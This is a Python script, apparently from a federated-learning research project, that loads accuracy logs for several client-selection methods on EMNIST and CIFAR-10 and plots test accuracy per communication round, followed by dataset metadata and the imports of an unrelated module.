plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, non-iid, FedAvg-based
round_t = []
emnist_random_non_iid_a = [0] * 400
emnist_FedCS_non_iid_a = [0] * 400
emnist_pow_d_non_iid_a = [0] * 400
emnist_E3CS_0_non_iid_a = [0] * 400
emnist_E3CS_05_non_iid_a = [0] * 400
emnist_E3CS_08_non_iid_a = [0] * 400
emnist_E3CS_inc_non_iid_a = [0] * 400
if os.path.isfile("output_emnist_random_non_iid_a.txt"):
emnist_random_non_iid_a_file = open("output_emnist_random_non_iid_a.txt")
emnist_random_non_iid_a = []
with emnist_random_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_non_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_emnist_FedCS_non_iid_a.txt"):
emnist_FedCS_non_iid_a_file = open("output_emnist_FedCS_non_iid_a.txt")
emnist_FedCS_non_iid_a = []
with emnist_FedCS_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_non_iid_a.txt"):
emnist_pow_d_non_iid_a_file = open("output_emnist_pow-d_non_iid_a.txt")
emnist_pow_d_non_iid_a = []
with emnist_pow_d_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_non_iid_a.txt"):
emnist_E3CS_0_non_iid_a_file = open("output_emnist_E3CS_0_non_iid_a.txt")
emnist_E3CS_0_non_iid_a = []
with emnist_E3CS_0_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_non_iid_a.txt"):
emnist_E3CS_05_non_iid_a_file = open("output_emnist_E3CS_05_non_iid_a.txt")
emnist_E3CS_05_non_iid_a = []
with emnist_E3CS_05_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_non_iid_a.txt"):
emnist_E3CS_08_non_iid_a_file = open("output_emnist_E3CS_08_non_iid_a.txt")
emnist_E3CS_08_non_iid_a = []
with emnist_E3CS_08_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_a.txt"):
emnist_E3CS_inc_non_iid_a_file = open("output_emnist_E3CS_inc_iid_a.txt")
emnist_E3CS_inc_non_iid_a = []
with emnist_E3CS_inc_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(2)
plt.plot(round_t, emnist_E3CS_0_non_iid_a, "pink")
plt.plot(round_t, emnist_E3CS_05_non_iid_a, 'b')
plt.plot(round_t, emnist_E3CS_08_non_iid_a, 'c')
plt.plot(round_t, emnist_E3CS_inc_non_iid_a, 'g')
plt.plot(round_t, emnist_FedCS_non_iid_a, 'y')
plt.plot(round_t, emnist_random_non_iid_a, 'orange')
plt.plot(round_t, emnist_pow_d_non_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, non-iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, iid, FedProx-based
emnist_random_iid_p = [0] * 400
emnist_FedCS_iid_p = [0] * 400
emnist_pow_d_iid_p = [0] * 400
emnist_E3CS_0_iid_p = [0] * 400
emnist_E3CS_05_iid_p = [0] * 400
emnist_E3CS_08_iid_p = [0] * 400
emnist_E3CS_inc_iid_p = [0] * 400
if os.path.isfile("output_emnist_random_iid_p.txt"):
emnist_random_iid_p_file = open("output_emnist_random_iid_p.txt")
emnist_random_iid_p = []
with emnist_random_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_FedCS_iid_p.txt"):
emnist_FedCS_iid_p_file = open("output_emnist_FedCS_iid_p.txt")
emnist_FedCS_iid_p = []
with emnist_FedCS_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_iid_p.txt"):
emnist_pow_d_iid_p_file = open("output_emnist_pow-d_iid_p.txt")
emnist_pow_d_iid_p = []
with emnist_pow_d_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_iid_p.txt"):
emnist_E3CS_0_iid_p_file = open("output_emnist_E3CS_0_iid_p.txt")
emnist_E3CS_0_iid_p = []
with emnist_E3CS_0_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_iid_p.txt"):
emnist_E3CS_05_iid_p_file = open("output_emnist_E3CS_05_iid_p.txt")
emnist_E3CS_05_iid_p = []
with emnist_E3CS_05_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_iid_p.txt"):
emnist_E3CS_08_iid_p_file = open("output_emnist_E3CS_08_iid_p.txt")
emnist_E3CS_08_iid_p = []
with emnist_E3CS_08_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_p.txt"):
emnist_E3CS_inc_iid_p_file = open("output_emnist_E3CS_inc_iid_p.txt")
emnist_E3CS_inc_iid_p = []
with emnist_E3CS_inc_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(3)
plt.plot(round_t, emnist_E3CS_0_iid_p, "pink")
plt.plot(round_t, emnist_E3CS_05_iid_p, 'b')
plt.plot(round_t, emnist_E3CS_08_iid_p, 'c')
plt.plot(round_t, emnist_E3CS_inc_iid_p, 'g')
plt.plot(round_t, emnist_FedCS_iid_p, 'y')
plt.plot(round_t, emnist_random_iid_p, 'orange')
plt.plot(round_t, emnist_pow_d_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, non-iid, FedProx-based
emnist_random_non_iid_p = [0] * 400
emnist_FedCS_non_iid_p = [0] * 400
emnist_pow_d_non_iid_p = [0] * 400
emnist_E3CS_0_non_iid_p = [0] * 400
emnist_E3CS_05_non_iid_p = [0] * 400
emnist_E3CS_08_non_iid_p = [0] * 400
emnist_E3CS_inc_non_iid_p = [0] * 400
if os.path.isfile("output_emnist_random_non_iid_p.txt"):
emnist_random_non_iid_p_file = open("output_emnist_random_non_iid_p.txt")
emnist_random_non_iid_p = []
with emnist_random_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_FedCS_non_iid_p.txt"):
emnist_FedCS_non_iid_p_file = open("output_emnist_FedCS_non_iid_p.txt")
emnist_FedCS_non_iid_p = []
with emnist_FedCS_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_non_iid_p.txt"):
emnist_pow_d_non_iid_p_file = open("output_emnist_pow-d_non_iid_p.txt")
emnist_pow_d_non_iid_p = []
with emnist_pow_d_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_non_iid_p.txt"):
emnist_E3CS_0_non_iid_p_file = open("output_emnist_E3CS_0_non_iid_p.txt")
emnist_E3CS_0_non_iid_p = []
with emnist_E3CS_0_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_non_iid_p.txt"):
emnist_E3CS_05_non_iid_p_file = open("output_emnist_E3CS_05_non_iid_p.txt")
emnist_E3CS_05_non_iid_p = []
with emnist_E3CS_05_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_non_iid_p.txt"):
emnist_E3CS_08_non_iid_p_file = open("output_emnist_E3CS_08_non_iid_p.txt")
emnist_E3CS_08_non_iid_p = []
with emnist_E3CS_08_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_non_iid_p.txt"):
emnist_E3CS_inc_non_iid_p_file = open("output_emnist_E3CS_inc_non_iid_p.txt")
emnist_E3CS_inc_non_iid_p = []
with emnist_E3CS_inc_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(4)
plt.plot(round_t, emnist_E3CS_0_non_iid_p, "pink")
plt.plot(round_t, emnist_E3CS_05_non_iid_p, 'b')
plt.plot(round_t, emnist_E3CS_08_non_iid_p, 'c')
plt.plot(round_t, emnist_E3CS_inc_non_iid_p, 'g')
plt.plot(round_t, emnist_FedCS_non_iid_p, 'y')
plt.plot(round_t, emnist_random_non_iid_p, 'orange')
plt.plot(round_t, emnist_pow_d_non_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, non-iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar, iid, FedAvg-based
round_t = []
cifar_random_iid_a = [0] * 200
cifar_FedCS_iid_a = [0] * 200
cifar_pow_d_iid_a = [0] * 200
cifar_E3CS_0_iid_a = [0] * 200
cifar_E3CS_05_iid_a = [0] * 200
cifar_E3CS_08_iid_a = [0] * 200
cifar_E3CS_inc_iid_a = [0] * 200
if os.path.isfile("output_cifar_random_iid_a.txt"):
cifar_random_iid_a_file = open("output_cifar_random_iid_a.txt")
cifar_random_iid_a = []
with cifar_random_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_cifar_FedCS_iid_a.txt"):
cifar_FedCS_iid_a_file = open("output_cifar_FedCS_iid_a.txt")
cifar_FedCS_iid_a = []
with cifar_FedCS_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_iid_a.txt"):
cifar_pow_d_iid_a_file = open("output_cifar_pow-d_iid_a.txt")
cifar_pow_d_iid_a = []
with cifar_pow_d_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_iid_a.txt"):
cifar_E3CS_0_iid_a_file = open("output_cifar_E3CS_0_iid_a.txt")
cifar_E3CS_0_iid_a = []
with cifar_E3CS_0_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_iid_a.txt"):
cifar_E3CS_05_iid_a_file = open("output_cifar_E3CS_05_iid_a.txt")
cifar_E3CS_05_iid_a = []
with cifar_E3CS_05_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_iid_a.txt"):
cifar_E3CS_08_iid_a_file = open("output_cifar_E3CS_08_iid_a.txt")
cifar_E3CS_08_iid_a = []
with cifar_E3CS_08_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_iid_a.txt"):
cifar_E3CS_inc_iid_a_file = open("output_cifar_E3CS_inc_iid_a.txt")
cifar_E3CS_inc_iid_a = []
with cifar_E3CS_inc_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(5)
plt.plot(round_t, cifar_E3CS_0_iid_a, "pink")
plt.plot(round_t, cifar_E3CS_05_iid_a, 'b')
plt.plot(round_t, cifar_E3CS_08_iid_a, 'c')
plt.plot(round_t, cifar_E3CS_inc_iid_a, 'g')
plt.plot(round_t, cifar_FedCS_iid_a, 'y')
plt.plot(round_t, cifar_random_iid_a, 'orange')
plt.plot(round_t, cifar_pow_d_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-Letter, non-iid, FedAvg-based
cifar_random_non_iid_a = [0] * 200
cifar_FedCS_non_iid_a = [0] * 200
cifar_pow_d_non_iid_a = [0] * 200
cifar_E3CS_0_non_iid_a = [0] * 200
cifar_E3CS_05_non_iid_a = [0] * 200
cifar_E3CS_08_non_iid_a = [0] * 200
cifar_E3CS_inc_non_iid_a = [0] * 200
if os.path.isfile("output_cifar_random_non_iid_a.txt"):
cifar_random_non_iid_a_file = open("output_cifar_random_non_iid_a.txt")
cifar_random_non_iid_a = []
with cifar_random_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_non_iid_a.txt"):
cifar_FedCS_non_iid_a_file = open("output_cifar_FedCS_non_iid_a.txt")
cifar_FedCS_non_iid_a = []
with cifar_FedCS_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_non_iid_a.txt"):
cifar_pow_d_non_iid_a_file = open("output_cifar_pow-d_non_iid_a.txt")
cifar_pow_d_non_iid_a = []
with cifar_pow_d_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_non_iid_a.txt"):
cifar_E3CS_0_non_iid_a_file = open("output_cifar_E3CS_0_non_iid_a.txt")
cifar_E3CS_0_non_iid_a = []
with cifar_E3CS_0_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_non_iid_a.txt"):
cifar_E3CS_05_non_iid_a_file = open("output_cifar_E3CS_05_non_iid_a.txt")
cifar_E3CS_05_non_iid_a = []
with cifar_E3CS_05_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_non_iid_a.txt"):
cifar_E3CS_08_non_iid_a_file = open("output_cifar_E3CS_08_non_iid_a.txt")
cifar_E3CS_08_non_iid_a = []
with cifar_E3CS_08_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_non_iid_a.txt"):
cifar_E3CS_inc_non_iid_a_file = open("output_cifar_E3CS_inc_non_iid_a.txt")
cifar_E3CS_inc_non_iid_a = []
with cifar_E3CS_inc_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(6)
plt.plot(round_t, cifar_E3CS_0_non_iid_a, "pink")
plt.plot(round_t, cifar_E3CS_05_non_iid_a, 'b')
plt.plot(round_t, cifar_E3CS_08_non_iid_a, 'c')
plt.plot(round_t, cifar_E3CS_inc_non_iid_a, 'g')
plt.plot(round_t, cifar_FedCS_non_iid_a, 'y')
plt.plot(round_t, cifar_random_non_iid_a, 'orange')
plt.plot(round_t, cifar_pow_d_non_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar, iid, Fedprox-based
cifar_random_iid_p = [0] * 200
cifar_FedCS_iid_p = [0] * 200
cifar_pow_d_iid_p = [0] * 200
cifar_E3CS_0_iid_p = [0] * 200
cifar_E3CS_05_iid_p = [0] * 200
cifar_E3CS_08_iid_p = [0] * 200
cifar_E3CS_inc_iid_p = [0] * 200
if os.path.isfile("output_cifar_random_iid_p.txt"):
cifar_random_iid_p_file = open("output_cifar_random_iid_p.txt")
cifar_random_iid_p = []
with cifar_random_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_iid_p.txt"):
cifar_FedCS_iid_p_file = open("output_cifar_FedCS_iid_p.txt")
cifar_FedCS_iid_p = []
with cifar_FedCS_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_iid_p.txt"):
cifar_pow_d_iid_p_file = open("output_cifar_pow-d_iid_p.txt")
cifar_pow_d_iid_p = []
with cifar_pow_d_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_iid_p.txt"):
cifar_E3CS_0_iid_p_file = open("output_cifar_E3CS_0_iid_p.txt")
cifar_E3CS_0_iid_p = []
with cifar_E3CS_0_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_iid_p.txt"):
cifar_E3CS_05_iid_p_file = open("output_cifar_E3CS_05_iid_p.txt")
cifar_E3CS_05_iid_p = []
with cifar_E3CS_05_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_iid_p.txt"):
cifar_E3CS_08_iid_p_file = open("output_cifar_E3CS_08_iid_p.txt")
cifar_E3CS_08_iid_p = []
with cifar_E3CS_08_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_iid_p.txt"):
cifar_E3CS_inc_iid_p_file = open("output_cifar_E3CS_inc_iid_p.txt")
cifar_E3CS_inc_iid_p = []
with cifar_E3CS_inc_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(7)
plt.plot(round_t, cifar_E3CS_0_iid_p, "pink")
plt.plot(round_t, cifar_E3CS_05_iid_p, 'b')
plt.plot(round_t, cifar_E3CS_08_iid_p, 'c')
plt.plot(round_t, cifar_E3CS_inc_iid_p, 'g')
plt.plot(round_t, cifar_FedCS_iid_p, 'y')
plt.plot(round_t, cifar_random_iid_p, 'orange')
plt.plot(round_t, cifar_pow_d_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-Letter, non-iid, FedProx-based
cifar_random_non_iid_p = [0] * 200
cifar_FedCS_non_iid_p = [0] * 200
cifar_pow_d_non_iid_p = [0] * 200
cifar_E3CS_0_non_iid_p = [0] * 200
cifar_E3CS_05_non_iid_p = [0] * 200
cifar_E3CS_08_non_iid_p = [0] * 200
cifar_E3CS_inc_non_iid_p = [0] * 200
if os.path.isfile("output_cifar_random_non_iid_p.txt"):
cifar_random_non_iid_p_file = open("output_cifar_random_non_iid_p.txt")
cifar_random_non_iid_p = []
with cifar_random_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_non_iid_p.txt"):
cifar_FedCS_non_iid_p_file = open("output_cifar_FedCS_non_iid_p.txt")
cifar_FedCS_non_iid_p = []
with cifar_FedCS_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_non_iid_p.txt"):
cifar_pow_d_non_iid_p_file = open("output_cifar_pow-d_non_iid_p.txt")
cifar_pow_d_non_iid_p = []
with cifar_pow_d_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_non_iid_p.txt"):
cifar_E3CS_0_non_iid_p_file = open("output_cifar_E3CS_0_non_iid_p.txt")
cifar_E3CS_0_non_iid_p = []
with cifar_E3CS_0_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_non_iid_p.txt"):
cifar_E3CS_05_non_iid_p_file = open("output_cifar_E3CS_05_non_iid_p.txt")
cifar_E3CS_05_non_iid_p = []
with cifar_E3CS_05_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_non_iid_p.txt"):
cifar_E3CS_08_non_iid_p_file = open("output_cifar_E3CS_08_non_iid_p.txt")
cifar_E3CS_08_non_iid_p = []
with cifar_E3CS_08_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_non_iid_p.txt"):
cifar_E3CS_inc_non_iid_p_file = open("output_cifar_E3CS_inc_non_iid_p.txt")
cifar_E3CS_inc_non_iid_p = []
with cifar_E3CS_inc_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(8)
plt.plot(round_t, cifar_E3CS_0_non_iid_p, "pink")
plt.plot(round_t, cifar_E3CS_05_non_iid_p, 'b')
plt.plot(round_t, cifar_E3CS_08_non_iid_p, 'c')
plt.plot(round_t, cifar_E3CS_inc_non_iid_p, 'g')
plt.plot(round_t, cifar_FedCS_non_iid_p, 'y')
plt.plot(round_t, cifar_random_non_iid_p, 'orange')
plt.plot(round_t, cifar_pow_d_non_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, non-iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-Letter, non-iid, FedProx-based
cifar_pow_d_30_non_iid_a = [0] * 200
cifar_pow_d_50_non_iid_a = [0] * 200
cifar_pow_d_70_non_iid_a = [0] * 200
if os.path.isfile("output_cifar_pow-d=30_iid_a.txt"):
cifar_pow_d_30_non_iid_p_file = open("output_cifar_pow-d=30_iid_a.txt")
cifar_pow_d_30_non_iid_a = []
with cifar_pow_d_30_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_30_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d=50_iid_a.txt"):
cifar_pow_d_50_iid_a_file = open("output_cifar_pow-d=50_iid_a.txt")
cifar_pow_d_50_non_iid_a = []
with cifar_pow_d_50_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_50_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d=70_iid_a.txt"):
cifar_pow_d_70_iid_a_file = open("output_cifar_pow-d=70_iid_a.txt")
cifar_pow_d_70_non_iid_a = []
with cifar_pow_d_50_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_70_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(9)
plt.plot(round_t, cifar_pow_d_30_non_iid_a, "pink")
plt.plot(round_t, cifar_pow_d_50_non_iid_a, 'b')
plt.plot(round_t, cifar_pow_d_70_non_iid_a, 'c')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based ")
plt.legend(["pow-d=30", "pow-d=50", "pow-d=70"])
plt.show()
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
graph()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| 38.133874 | 88 | 0.555186 | 5,538 | 37,600 | 3.353738 | 0.019321 | 0.05298 | 0.045981 | 0.044473 | 0.986378 | 0.974425 | 0.947451 | 0.884025 | 0.858989 | 0.827653 | 0 | 0.05579 | 0.345 | 37,600 | 985 | 89 | 38.172589 | 0.698351 | 0.015186 | 0 | 0.516237 | 0 | 0 | 0.130377 | 0.101005 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00112 | false | 0 | 0.004479 | 0 | 0.005599 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c15e1e68b417c22602fac4356852de590f27209c | 21,242 | py | Python | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | from .stage01_quantification_peakInformation_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
